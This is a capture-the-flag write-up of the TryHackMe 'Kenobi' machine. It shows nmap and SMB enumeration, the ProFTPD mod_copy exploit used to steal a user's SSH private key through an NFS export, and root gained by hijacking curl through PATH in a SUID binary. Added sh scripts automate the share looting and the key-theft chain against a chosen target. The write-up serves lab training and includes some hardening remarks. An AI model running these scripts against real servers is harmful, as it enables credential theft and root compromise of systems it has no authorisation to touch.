THM - Kenobi

skibum 8/29/2020

Recon

NMAP scans

  1. Scan for open ports and identify what services are available (`-A` only covers nmap's default top 1000 TCP ports, so follow up with `-p-` if something looks missing).

    nmap -A -oN nmap/FullScan <Machine_IP> 
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 06:56 CDT
    Nmap scan report for <Machine_IP> 
    Host is up (0.20s latency).
    Not shown: 990 closed ports
    PORT     STATE    SERVICE       VERSION
    21/tcp   open     ftp           ProFTPD 1.3.5
    22/tcp   open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
    |   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
    |_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
    80/tcp   open     http          Apache httpd 2.4.18 ((Ubuntu))
    | http-robots.txt: 1 disallowed entry 
    |_/admin.html
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp  open     rpcbind       2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100003  2,3,4       2049/udp6  nfs
    |   100005  1,2,3      36173/udp   mountd
    |   100005  1,2,3      38913/tcp6  mountd
    |   100005  1,2,3      43825/udp6  mountd
    |   100005  1,2,3      44273/tcp   mountd
    |   100021  1,3,4      37709/tcp   nlockmgr
    |   100021  1,3,4      44971/tcp6  nlockmgr
    |   100021  1,3,4      46911/udp   nlockmgr
    |   100021  1,3,4      49498/udp6  nlockmgr
    |   100227  2,3         2049/tcp   nfs_acl
    |   100227  2,3         2049/tcp6  nfs_acl
    |   100227  2,3         2049/udp   nfs_acl
    |_  100227  2,3         2049/udp6  nfs_acl
    139/tcp  open     netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open     netbios-ssn   Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    1666/tcp filtered netview-aix-6
    1801/tcp filtered msmq
    2049/tcp filtered nfs
    3703/tcp filtered adobeserver-3
    Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
    |_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery: 
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: kenobi
    |   NetBIOS computer name: KENOBI\x00
    |   Domain name: \x00
    |   FQDN: kenobi
    |_  System time: 2020-08-29T06:56:47-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-08-29T11:56:47
    |_  start_date: N/A
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
    
  2. SMB and RPC are both available; run the SMB enumeration scripts first.

    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <Machine_IP> -oN nmap/smb445   
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:44 CDT
    Nmap scan report for<Machine_IP> 
    Host is up (0.21s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\<Machine_IP>\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: <unlimited>
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\<Machine_IP>\anonymous: 
    |     Type: STYPE_DISKTREE
    |     Comment: 
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\home\kenobi\share
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\<Machine_IP>\print$: 
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: <none>
    |_    Current user access: <none>
    |_smb-enum-users: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 43.14 seconds
    
  3. Now run the NFS scripts against rpcbind to see what is exported.

    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <Machine_IP> -oN nmap/rpc111
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:47 CDT
    Nmap scan report for <Machine_IP>
    Host is up (0.30s latency).
    
    PORT    STATE SERVICE
    111/tcp open  rpcbind
    | nfs-showmount: 
    |_  /var *
    
    Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
    

SMB client

  • Connect to the anonymous share with smbclient; press Enter at the password prompt to get a null session:

    smbclient //<Machine_IP>/Anonymous 
    Enter WORKGROUP\skibum's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Sep  4 05:49:09 2019
      ..                                  D        0  Wed Sep  4 05:56:07 2019
      log.txt                             N    12237  Wed Sep  4 05:49:09 2019
    
            9204224 blocks of size 1024. 6877100 blocks available
    smb: \> get log.txt
    getting file \log.txt of size 12237 as log.txt (12.2 KiloBytes/sec) (average 12.2 KiloBytes/sec)
    smb: \> exit
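Added here as a worked example, not part of the original write-up: a small sh script that pulls the anonymously readable disk shares out of smb-enum-shares output and loots them non-interactively with smbclient, instead of reading the scan by eye and typing `get` for each file. The scan text it parses is constructed from the scan above with 192.0.2.10 as a stand-in address; `TARGET`, `loot_share` and the `loot/` directory are names chosen for this example.

```shell
#!/bin/sh
# Added example: enumerate anonymously readable disk shares from nmap's
# smb-enum-shares output and download them with a null session.

# Constructed sample, trimmed from the scan above (192.0.2.10 is a stand-in).
SAMPLE_SCAN='| smb-enum-shares: 
|   account_used: guest
|   \\192.0.2.10\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ/WRITE
|   \\192.0.2.10\anonymous:
|     Type: STYPE_DISKTREE
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|   \\192.0.2.10\print$:
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|_    Current user access: <none>'

# Print the names of disk shares (STYPE_DISKTREE) that anonymous users can read.
# IPC$ is skipped on purpose: it is always "readable" but holds no files.
# Reads smb-enum-shares output on stdin.
anon_readable_shares() {
  awk '
    /^[|][ ]+\\\\/ {                          # "|   \\host\share:" starts a share
      share = $0
      sub(/^[|][ ]+\\\\[^\\]*\\/, "", share)  # drop "|   \\host\"
      sub(/:[ ]*$/, "", share)                # drop the trailing colon
      type = ""
    }
    /Type:/ { type = $NF }
    /Anonymous access:/ {
      if (share != "" && type == "STYPE_DISKTREE" && $0 ~ /READ/) print share
    }
  '
}

# Recursively download one share into <outdir> with a null session:
# -N sends no password, recurse/prompt OFF make "mget *" non-interactive.
loot_share() {
  host=$1 share=$2 outdir=$3
  mkdir -p "$outdir"
  smbclient -N "//$host/$share" -c "lcd $outdir; recurse ON; prompt OFF; mget *"
}

# Demo on the constructed scan; set TARGET=<ip> to run the real scan and loot.
printf '%s\n' "$SAMPLE_SCAN" | anon_readable_shares
if [ -n "${TARGET:-}" ]; then
  nmap -p 445 --script smb-enum-shares "$TARGET" \
    | anon_readable_shares \
    | while read -r s; do loot_share "$TARGET" "$s" "loot/$s"; done
fi
```

On the constructed input only `anonymous` is printed: IPC$ is filtered by share type and print$ by its `<none>` access line. Keep the scan's "Anonymous access: READ/WRITE" on the anonymous share in mind as a finding in its own right; a world-writable share backed by a user's home directory is worth reporting whether or not it leads anywhere.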
    

  • Read the downloaded file for anything useful:

    cat log.txt


## FTP

1. Connect to the FTP service and check the banner

    nc <Machine_IP> 21
    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) []

2. Exploit ProFTPD 1.3.5 (mod_copy, CVE-2015-3306). The module accepts SITE CPFR/CPTO from a client that has not logged in, so the server copies files for us. Copy kenobi's private key into /var, which is the NFS export found during recon:

    SITE CPFR /home/kenobi/.ssh/id_rsa
    350 File or directory exists, ready for destination name
    SITE CPTO /var/tmp/id_rsa
    250 Copy successful

3. Mount the NFS export and pull the key (ssh refuses a key file that is group- or world-readable, hence the chmod)

    mkdir /mnt/kenobiNFS
    mount <Machine_IP>:/var /mnt/kenobiNFS
    ls -la /mnt/kenobiNFS/tmp
    cp /mnt/kenobiNFS/tmp/id_rsa .
    chmod 600 id_rsa

4. SSH into the machine

    ssh -i id_rsa kenobi@<Machine_IP>
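The steps above as one script, added here as an example and not taken from the write-up: it sends the two SITE commands without logging in, checks the reply codes before touching NFS, mounts the export read-only and fixes the key's mode. `TARGET`, the `/mnt/kenobiNFS` mount point and the `/var/tmp/id_rsa` destination are assumptions taken from the steps above; the sample replies used to check `copy_succeeded` are constructed.

```shell
#!/bin/sh
# Added example: ProFTPD mod_copy abuse plus the NFS pull as one script.

# Issue SITE CPFR/CPTO without logging in and print the server's reply.
# The sleeps give ProFTPD time to send its banner and process the commands
# before nc sees EOF on stdin and closes the connection.
mod_copy() {
  host=$1 src=$2 dst=$3
  { sleep 1; printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$src" "$dst"; sleep 2; } \
    | nc -w 5 "$host" 21
}

# Succeed only when CPFR answered 350 and CPTO answered 250 (reply on stdin).
# Anything else (530 login required, 550 permission denied) means the copy
# did not happen and there is no point mounting NFS.
copy_succeeded() {
  awk '/^350 / { cpfr = 1 } /^250 / { cpto = 1 } END { exit !(cpfr && cpto) }'
}

# Mount the /var export read-only, copy the key and fix its mode for ssh.
# nolock avoids needing rpc.statd on the attacking box.
fetch_key_over_nfs() {
  host=$1 mnt=${2:-/mnt/kenobiNFS}
  mkdir -p "$mnt"
  mount -t nfs -o ro,nolock "$host:/var" "$mnt"
  cp "$mnt/tmp/id_rsa" ./id_rsa
  chmod 600 ./id_rsa          # ssh refuses group/world-readable keys
  umount "$mnt"
}

# Set TARGET=<ip> to run the chain for real (mount needs root locally).
if [ -n "${TARGET:-}" ]; then
  if mod_copy "$TARGET" /home/kenobi/.ssh/id_rsa /var/tmp/id_rsa | copy_succeeded; then
    fetch_key_over_nfs "$TARGET" && ssh -i ./id_rsa "kenobi@$TARGET"
  else
    echo "mod_copy did not succeed; is SITE CPFR/CPTO available?" >&2
  fi
fi
```

Checking the reply codes matters because a patched ProFTPD answers the SITE commands with an error instead of 350/250, and silently mounting NFS afterwards would just hide that. The export itself (`/var *`) is the other finding to note: anything the FTP daemon can write under /var is readable by every NFS client.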


## priv esc

1. Find SUID files

    find / -perm /4000 -type f 2>/dev/null

   Look for something that stands out. /usr/bin/menu is not a standard Ubuntu binary; the rest are the usual SUID helpers.

  • /sbin/mount.nfs
  • /usr/lib/policykit-1/polkit-agent-helper-1
  • /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  • /usr/lib/snapd/snap-confine
  • /usr/lib/eject/dmcrypt-get-device
  • /usr/lib/openssh/ssh-keysign
  • /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  • /usr/bin/chfn
  • /usr/bin/newgidmap
  • /usr/bin/pkexec
  • /usr/bin/passwd
  • /usr/bin/newuidmap
  • /usr/bin/gpasswd
  • /usr/bin/menu
  • /usr/bin/sudo
  • /usr/bin/chsh
  • /usr/bin/at
  • /usr/bin/newgrp
  • /bin/umount
  • /bin/fusermount
  • /bin/mount
  • /bin/ping
  • /bin/su
  • /bin/ping6

2. Run the binary that stands out and see what each option does

    /usr/bin/menu

    1. status check
    2. kernel version
    3. ifconfig
    ** Enter your choice :1
    HTTP/1.1 200 OK
    Date: Sat, 29 Aug 2020 17:51:48 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
    ETag: "c8-591b6884b6ed2"
    Accept-Ranges: bytes
    Content-Length: 200
    Vary: Accept-Encoding
    Content-Type: text/html
    

    The status check printed the local web server's response headers, which is what `curl -I` produces, so the menu shells out to curl. If it resolves curl through PATH rather than by absolute path, and it runs as root because of the SUID bit, then whoever controls PATH controls which curl runs as root.

3. Hijack curl through PATH: put a fake curl in /tmp and put /tmp first in PATH, then run the menu again

    cd /tmp
    echo /bin/sh > curl
    chmod 777 curl
    export PATH=/tmp:$PATH
    /usr/bin/menu

    1. status check
    2. kernel version
    3. ifconfig
    ** Enter your choice :1
    # id
    uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
    # whoami
    root
    # 

    The fake curl has no shebang, so the shell runs it as a script and its one line, /bin/sh, spawns an interactive shell. The uid is 0 because the SUID bit sets the effective uid; the gid is still kenobi's because only the user bit is set.
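Added here as a worked example, not from the write-up or from the box's own source: a runnable sh demo of the PATH hijack beside the fix. `vulnerable_status_check` mimics what option 1 of the menu does (run `curl` found via PATH) and `hardened_status_check` shows the corrected form. The menu binary's source is not on the page; that it invokes curl by bare name is inferred from the hijack working. The fake curl prints the uid it runs as instead of dropping a shell so the effect is visible in a script.

```shell
#!/bin/sh
# Added example: PATH hijack of an unqualified "curl", vulnerable vs hardened.

# What the SUID menu effectively runs: the shell resolves "curl" via $PATH,
# and $PATH is inherited from the unprivileged caller.
vulnerable_status_check() {
  curl -I localhost 2>&1
}

# Fixed PATH plus an absolute path: the caller's PATH no longer matters.
# (A SUID binary should also drop privileges, or not be SUID at all, before
# spawning anything; PATH control is just the bug this box exploits.)
hardened_status_check() {
  PATH=/usr/bin:/bin /usr/bin/curl -m 3 -I localhost 2>&1 || echo "curl failed (rc=$?)"
}

# Plant a fake curl that reports who it is running as. On the box the file
# is just "/bin/sh"; here it prints instead of dropping into a shell.
plant_fake_curl() {
  dir=$1
  mkdir -p "$dir"
  printf '#!/bin/sh\necho "HIJACKED: running as uid $(id -u)"\n' > "$dir/curl"
  chmod 755 "$dir/curl"
}

# Run the vulnerable check with a writable directory first in PATH (what the
# exploit does with /tmp); a subshell keeps the caller's PATH untouched.
run_hijack_demo() {
  dir=$(mktemp -d)
  plant_fake_curl "$dir"
  ( PATH="$dir:$PATH"; export PATH; vulnerable_status_check )
  rm -rf "$dir"
}

# Same hostile PATH, hardened check: the fake curl is never consulted.
run_hardened_demo() {
  dir=$(mktemp -d)
  plant_fake_curl "$dir"
  ( PATH="$dir:$PATH"; export PATH; hardened_status_check )
  rm -rf "$dir"
}

run_hijack_demo
run_hardened_demo
```

Run as an ordinary user the first call prints `HIJACKED: running as uid <your uid>`; run through a root-SUID wrapper that calls `curl` by name it would print uid 0, which is the whole box in one line. Before trying this on a target, `strings /usr/bin/menu | grep -i curl` is the quick way to confirm the binary calls curl by bare name rather than by absolute path.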

P0wn3d!!!!

